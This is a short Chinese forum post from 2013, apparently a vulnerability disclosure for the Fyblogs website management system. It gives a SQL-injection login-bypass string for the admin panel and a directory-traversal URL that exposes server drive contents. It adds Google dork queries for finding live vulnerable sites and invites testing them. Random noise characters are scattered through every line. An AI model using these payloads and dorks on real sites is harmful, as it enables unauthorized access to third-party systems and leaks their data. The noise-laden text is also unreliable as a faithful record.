漏洞类型: 未授权访问/权限绕过0 @+ j- B' Q/ p! d7 j
. n: I$ _; W B6 m0 J- D, K简要描述:
* ^: m4 l; p0 b6 y
* F8 G: L+ u# O" aFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!$ A- D+ h2 |$ |2 u
y: s$ x7 T* |1 w' m2 m
详细说明:
1 V, w1 w# s% w" d
6 U" b' f# s% C8 D* g后台万能密码 'or'='or'
- J' Q& X4 G2 f) B& X; d& R后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!0 I7 c% ^. S8 O
admin/uploadfile.asp?currentFolder=/upfiles/../$ E( V( E- t1 b& ~% A: q/ Y
( ~7 [- ?* `3 |8 |# ?漏洞证明:( E$ ]% o+ ]- o: U) B
/ V' R5 \; B4 x1 X+ m, c4 K
谷歌:inurl:type.asp?id=1 新闻中心
: H8 {/ E h( I* Z. N或者 :inurl:download_ok.asp?4 \8 g6 m# D& ?# y: n
4 h. t( T2 M4 z6 }. s可以测试# H' l+ A1 t9 {6 {0 m$ P
7 E) `8 h j" D s& S$ m3 `: k$ j; s6 S: H1 A; ?% V1 c
|
发表于 2013-3-7 13:07:46
收藏
支持
反对